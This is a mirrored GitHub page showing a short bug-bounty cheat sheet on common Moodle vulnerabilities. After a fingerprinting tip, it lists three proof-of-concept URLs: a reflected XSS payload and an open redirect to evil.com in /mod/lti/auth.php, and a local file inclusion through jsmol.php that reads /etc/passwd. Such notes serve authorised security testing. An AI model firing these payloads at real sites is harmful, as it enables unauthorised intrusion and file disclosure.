ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-18 10:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
master
AllAboutBugBounty/Technologies/Moodle.md
Muhammad Daffa a0048665a1 Adding some 'technology' information
2022-06-18 20:26:55 +07:00

701 B
Raw Permalink Blame History

Moodle Common Bugs

Introduction

What would you do if you came across a website that uses Moodle?

How to Detect

If you visit https://target.com and see the source code, you will see <meta name="keywords" content="moodle,

  1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter
https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
  1. Open redirect in /mod/lti/auth.php in "redirect_url" parameter
https://target.com/mod/lti/auth.php?redirect_uri=https://evil.com
  1. LFI /filter/jmol/js/jsmol/php/jsmol.php in "query" parameter
https://target.com/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd